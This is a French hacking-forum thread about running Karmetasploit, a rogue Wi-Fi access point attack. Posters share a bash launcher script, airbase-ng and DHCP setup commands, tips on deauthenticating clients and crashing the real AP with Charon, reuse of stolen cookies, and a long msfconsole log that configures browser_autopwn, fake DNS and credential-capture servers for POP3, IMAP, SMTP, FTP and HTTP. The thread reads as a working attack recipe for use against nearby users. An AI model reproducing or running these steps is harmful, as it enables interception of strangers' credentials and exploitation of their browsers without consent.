Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#76 22-05-2009 19:06:01

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

scarfays a écrit :

Et que faire des cookies récupérés?

Création de cookies sous BT3 à l'aide de Firefox wink

Sinon pour ce qui est de la connexion du client sur ta rogue AP, tu peux jouer avec les différentes options d'Airbase-ng, et aussi lancer des déauthentifications en parallèle histoire d'aider le client à se connecter.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#77 11-06-2009 22:18:37

Raphu
Membre Indétronable
Lieu : localhost
Inscription : 09-06-2009
Messages : 192

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Tout d'abord une remarque, au sujet du fake AP, il serait possible de crasher l'AP pour lequel on veut se faire passer à l'aide de Charon 2.0 ( téléchargeable ici : http://neovortex.kodings.googlepages.co … n2.0.1.lzm ). Je l'ai lancé avec airodump en parallèle, apparemment il floode l'AP ciblé de requêtes d'authentification bidons. Une fois l'AP ciblé inactif, on crée notre faux AP diffusant le même ESSID.

Ensuite une question, quelle est la différence entre un faux AP crée avec airbase, ou avec wlanconfig ? En utilisant la syntaxe suivante pour wlanconfig :
bt ~ # wlanconfig ath1 create wlandev wifi0 wlanmode ap


Enfin un problème, mon fake AP ne fonctionne pas du tout. J'ai voulu créer un AP tout a fait ordinaire, (pas de relai vers internet, juste créer le point d'accès wifi et un serveur dhcp), avec la syntaxe suivante :

Shell 1 :
bt ~ # modprobe tun
bt ~ # airbase-ng -c 11 -e Wifi_test ath1    ( ath1 démarré en mode monitor )

Shell 2 :
bt ~ # ifconfig at0 up
bt ~ # ifconfig at0 10.0.0.1 netmask 255.255.255.0
bt ~ # route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
bt ~ # dhcpd at0     ( j'utilise le fichier de configuration par défaut )

Depuis mon PC windows, je voit bien Wifi_test, mais si j'essaye de me connecter dessus, il ne se passe rien, il n'acquiert pas d'ip ( d'après ipconfig ), je voit juste les requêtes d'authentification dans le shell ou j'ai lancé airbase.

Hors Ligne

#78 12-06-2009 17:11:57

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Si ton client de test sous Win n'a pas d'IP, c'est probablement un problème de dhcp. Suis exactement les explications données au début du topic, ça fonctionne parfaitement. Je précise que ce topic concerne Karmetasploit, et non pas les rogue AP en général. Tu devrais créer un topic dédié à tes tests sur des fake AP si ton optique n'est pas d'utiliser Karmetasploit mais simplement d'obtenir une rogue AP fonctionnelle wink

Hors Ligne

#79 12-06-2009 18:41:13

Raphu
Membre Indétronable
Lieu : localhost
Inscription : 09-06-2009
Messages : 192

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Mais j'ai bien l'intention de tester Karmetasploit à l'avenir, c'est juste que je ne voulais pas exécuter le script sans rien comprendre à ce qu'il y a dedans hmm  Pour cela je voulais tester la fake AP seule, puis en faire un pseudo hub et enfin utiliser metasploit. Mais bon comme je suis coincé au début je vais faire un topic à part, ca évitera de flooder ici.

Je ferais un test ce soit avec wlanconfig et si ça marche pas, je vous rédigerais un compte rendu un peu plus détaillé de mes manips.

Hors Ligne

#80 03-11-2009 12:35:02

sevaga5
Nouveau membre
Inscription : 31-10-2009
Messages : 8

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour,
Pour ceux qui utilisent Backtrack 4, voici la partie karmetaploit :

#!/bin/bash
# The script must run after RogueAP.sh in another terminal
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 # "awaking" interface created by airbase-ng in RogueAP
sleep 2 # wait 2 sec
echo > /var/lib/dhcp3/dhcpd.leases # reset all previous leases
dhcpd3 -pf /var/run/dhcp3-server/dhcpd.pid -cf dhcpd.conf at0 # launch dhcpd using our dhcpd.conf
sleep 2 # wait 2 sec
ifconfig at0 mtu 1800 # set maximum transfer unit of at0
tcpdump -ni at0 -s 0 -w karma_dump.cap >/dev/null 2>&1 & /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc # listen on at0 and lauch karma exploit module

# -> create karma.db in root readable using db_notes while runing or :
# cd /root
# sqlite3 karma.db
# sqlite>.mode html
# sqlite>.output karma.html
# sqlite>select * from notes;
# sqlite>.quit

# To see all at0 packets dumped by tcpdump : wireshark karma_dump.cap

Voila, désolé si les commentaires sont en anglais mais c'est plus simple pour moi et j'ai juste copy/paste le contenu de mon fichier. Je peux traduire pour ceux qui veulent.
Notez qu'on utilise un fichier pid situé dans dhcp3-server car dhcpd n'a pas les droits pour écrire dans le répértoire par défaut

Sinon sous BT4 penser à télécharger le module karma.rc (svn update n'a pas suffit pour moi...)
cd /pentest/exploits/framework3/
wget http://metasploit.com/users/hdm/tools/karma.rc)

Hors Ligne

#81 03-11-2009 17:33:57

scofild11
Membre Indéboulonnable
Inscription : 23-01-2009
Messages : 122

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

ya til besoin d'avoir la clé wep ???
ou sa marche que sur les hotspots?...

Hors Ligne

#82 03-11-2009 18:38:47

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

scofild11 tu devrais commencer par la page 1 de se topic .


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#83 03-11-2009 18:39:16

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Ca tourne sous Airbase-ng pour la partie Rogue AP, donc ça va fonctionner sur du WEP et de l'OPN. Tout est expliqué dans le topic.

Hors Ligne

#84 12-11-2009 16:37:13

murdock69
Nouveau membre
Inscription : 06-10-2009
Messages : 5

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Mon dieu je viens de tester cet Outil...............
C'est impressionnant!!!!

Hors Ligne

#85 07-12-2009 23:16:55

mikael8313
Membre
Inscription : 11-08-2009
Messages : 19

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonsoir ,


J'ai exactement la meme erreur que whois  sauf que moi je suis sous ubuntu


exiting.
SIOCSIFMTU: Invalid argument
[*] WARNING! The following modules could not be loaded!

        /pentest/exploits/framework3/modules/exploits/test/dialup.rb: MissingSourceFile /usr/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require': no such file to load -- serialport



Voici l'erreur en question et sa fait 3 jour que je me prend la tete dessus a résoudre cette erreur   j'ai installer framework 3 et ruby toute les versions  ,  j'ai la derniere version de aircrack et pourtant quand je lance le script j'ai cette erreur    le fichier custom_requiere est bien present  sauf que moi j'ai :31 au lui de 27    mais j'ai exactement cette erreur de --serialport que viendrais t'il faire ici?

Si vous avais déja rencontrer ce probleme ? 

Si vous savez quelle libraire manquante faut t'il installer dans tous les Ruby .

Merci de me donner plus d'ample information sur ce sujet .


je suis bien sur sur ubuntu 9.10

Hors Ligne

#86 08-12-2009 12:02:04

qwertazert
Membre Irremplaçable
Inscription : 20-09-2009
Messages : 1 057

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

ca fait un moment que je me tate à vous poster un topic sur la realisation de mon reseau (tout en filaire)
Mais là, le wifi deviens + que dangereux !!

Un rj 45 par piece qui fait phone et reseau...

Je pense que je vais vous le poster d'ici la fin de semaine...


[img align=g]http://imagik.fr/thumb/133444.jpeg[/img]Moïse dit à Dieu, 10 commandements !!! gravé sur des tablettes en pierres !!! C'est lourd !!!
Vous n'auriez pas une clé usb plutôt ? Dieu lui répondit.
Regardes moi droit dans les cieux et redis moi ça si tu ose !!!
Commandement N'11 : Ton voisin tu ne piratera point (Ceci n'est pas un lien)

Hors Ligne

#87 18-12-2009 18:44:06

grolot
Membre
Inscription : 13-12-2009
Messages : 23

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

slt ce que quelqu'un peut me faire un tuto pour ubuntu
paquet a installe etc..
merci de votre aide

Hors Ligne

#88 26-12-2009 11:38:27

mikael8313
Membre
Inscription : 11-08-2009
Messages : 19

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour aprés multi tentative je n'arrive toujours pas a faire marcher   ce script  je suis sous ubuntu 9.10  avec tous les paquet installer  ( aircrack ,  metasploit, etc..... )    le script se lance bien mais c'est au niveaux du DHCP que sa cafouille un peu


voici  les erreur  que le terminal ressort
[email protected]:/home# ./karmetasploit.sh
dhcpd: no process found                   
tcpdump: no process found                 
airbase-ng: no process found               


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
842     NetworkManager
848     avahi-daemon 
917     avahi-daemon 
1122    wpa_supplicant
14587   dhclient     
Process with PID 14587 (dhclient) is running on interface wlan0


Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy2]
                                (monitor mode enabled on mon0)

* Stopping DHCP server dhcpd3                                                                                                                            [ OK ]
* Starting DHCP server dhcpd3                                                                                                                            [ OK ]
[*] WARNING! The following modules could not be loaded!                                                                                                         

        /pentest/exploits/framework3/modules/exploits/test/dialup.rb: MissingSourceFile /usr/lib/ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require': no such file to load -- serialport                                                                                                                             



#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #   
# ## # #####    #   #    #  ####  #    # #      #    # #   #   
#    # #        #   ######      # #####  #      #    # #   #   
#    # #        #   #    # #    # #      #      #    # #   #   
#    # ######   #   #    #  ####  #      ######  ####  #   #   


       =[ msf v3.3-dev
+ -- --=[ 343 exploits - 223 payloads
+ -- --=[ 20 encoders - 7 nops       
       =[ 123 aux                   

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db       
[*] The specified database already exists, connecting
[*] Successfully connected to the database           
[*] File: /root/karma.db                             
resource> use auxiliary/server/browser_autopwn       
resource> setg AUTOPWN_HOST 10.0.0.1                 
AUTOPWN_HOST => 10.0.0.1                             
resource> setg AUTOPWN_PORT 55550                   
AUTOPWN_PORT => 55550                               
resource> setg AUTOPWN_URI /ads                     
AUTOPWN_URI => /ads                                 
resource> set LHOST 10.0.0.1                         
LHOST => 10.0.0.1                                   
resource> set LPORT 45000                           
LPORT => 45000                                       
resource> set SRVPORT 55550                         
SRVPORT => 55550                                     
resource> set URIPATH /ads                           
URIPATH => /ads                                     
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/pop3         
resource> set SRVPORT 110                           
SRVPORT => 110                                       
resource> set SSL false                             
SSL => false                                         
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/pop3         
resource> set SRVPORT 995                           
SRVPORT => 995                                       
resource> set SSL true                               
SSL => true                                         
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/ftp           
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/imap         
resource> set SSL false                             
SSL => false                                         
resource> set SRVPORT 143                           
SRVPORT => 143                                       
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/imap         
resource> set SSL true                               
SSL => true                                         
resource> set SRVPORT 993                           
SRVPORT => 993                                       
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/smtp         
resource> set SSL false                             
SSL => false                                         
resource> set SRVPORT 25                             
SRVPORT => 25                                       
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/smtp         
resource> set SSL true                               
SSL => true                                         
resource> set SRVPORT 465                           
SRVPORT => 465                                       
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/fakedns               
resource> unset TARGETHOST                           
Unsetting TARGETHOST...                             
resource> set SRVPORT 5353                           
SRVPORT => 5353                                     
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/fakedns               
resource> unset TARGETHOST                           
Unsetting TARGETHOST...                             
resource> set SRVPORT 53                             
SRVPORT => 53                                       
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/http         
resource> set SRVPORT 80                             
SRVPORT => 80                                       
resource> set SSL false                             
SSL => false                                         
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/http         
resource> set SRVPORT 8080                           
SRVPORT => 8080                                     
resource> set SSL false                             
SSL => false                                         
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/http         
resource> set SRVPORT 443                           
SRVPORT => 443                                       
resource> set SSL true                               
SSL => true                                         
resource> run                                       
[*] Auxiliary module running as background job       
resource> use auxiliary/server/capture/http         
resource> set SRVPORT 8443                           
SRVPORT => 8443                                     
resource> set SSL true                               
SSL => true                                         
resource> run                                       
[*] Auxiliary module running as background job       
msf auxiliary(http) >                               
[*] Starting exploit modules on host 10.0.0.1...     
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:995).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:110).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:8443).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:443).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:8080).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:80). 
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:465).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:25). 
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:993).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:143).
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:21).

[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-] Call stack:                                                                     
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[*] Handler binding to LHOST 0.0.0.0                                                   
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-] Bind failed on 0.0.0.0                                                             
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[*] Handler binding to LHOST 10.0.0.1                                                 
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-] Bind failed on 10.0.0.1                                                           
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:323:in `start_service' 
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-] Exploit failed: The address is already in use (10.0.0.1:45000).                   
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   (eval):57:in `run'                                                               
[-]   (eval):57:in `run'                                                               
[*] Handler binding to LHOST 0.0.0.0                                                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-]   (eval):80:in `run'                                                               
[-]   (eval):80:in `run'                                                               
[-]   (eval):80:in `run'                                                               
[-]   (eval):80:in `run'                                                               
[-]   (eval):55:in `run'                                                               
[-]   (eval):55:in `run'                                                               
[-]   (eval):55:in `run'                                                               
[-]   (eval):55:in `run'                                                               
[-]   (eval):55:in `run'                                                               
[-] Bind failed on 0.0.0.0                                                             
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 10.0.0.1                                                           
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Exploit failed: The address is already in use (10.0.0.1:45002).                   
[-] Exploit failed: The address is already in use (10.0.0.1:45001).             
     
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45003).                 
   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 0.0.0.0                                                             
[-] Exploit failed: The address is already in use (10.0.0.1:45004).                    
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 0.0.0.0                                                             
[-] Exploit failed: The address is already in use (10.0.0.1:45005).                   
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 0.0.0.0                                                             
[-] Exploit failed: The address is already in use (10.0.0.1:45006).                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 0.0.0.0                                                             
[-] Bind failed on 10.0.0.1                                                           
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Exploit failed: The address is already in use (10.0.0.1:45007).                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 0.0.0.0                                                             
[-] Exploit failed: The address is already in use (10.0.0.1:45008).                   
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Exploit failed: The address is already in use (10.0.0.1:45009).                   
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45010).                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 0.0.0.0                                                             
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[*] Handler binding to LHOST 0.0.0.0                                                   
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Bind failed on 0.0.0.0                                                             
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45011).                   
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45012).                   
[-] Exploit failed: The address is already in use (10.0.0.1:45013).                   
[-] Auxiliary failed: Rex::AddressInUse The address is already in use (0.0.0.0:55550).
[-] Call stack:                                                                       
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:142:in `create_by_type'
[-]   /pentest/exploits/framework3/lib/rex/socket/comm/local.rb:26:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/socket.rb:45:in `create_param'             
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:38:in `create_param'   
[-]   /pentest/exploits/framework3/lib/rex/socket/tcp_server.rb:27:in `create'         
[-]   /pentest/exploits/framework3/lib/rex/proto/http/server.rb:131:in `start'         
[-]   /pentest/exploits/framework3/lib/rex/service_manager.rb:80:in `start'           
[-]   /pentest/exploits/framework3/lib/rex/service_manager.rb:24:in `start'           
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/http.rb:327:in `start_service'
[-]   /pentest/exploits/framework3/lib/msf/core/exploit/tcp.rb:273:in `exploit'       
[-]   (eval):256:in `run'                                                             
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45014).                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45016).                   
[*] Handler binding to LHOST 0.0.0.0                                                   
[-] Bind failed on 0.0.0.0                                                             
[*] Handler binding to LHOST 10.0.0.1                                                 
[-] Bind failed on 10.0.0.1                                                           
[-] Exploit failed: The address is already in use (10.0.0.1:45017).                   
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
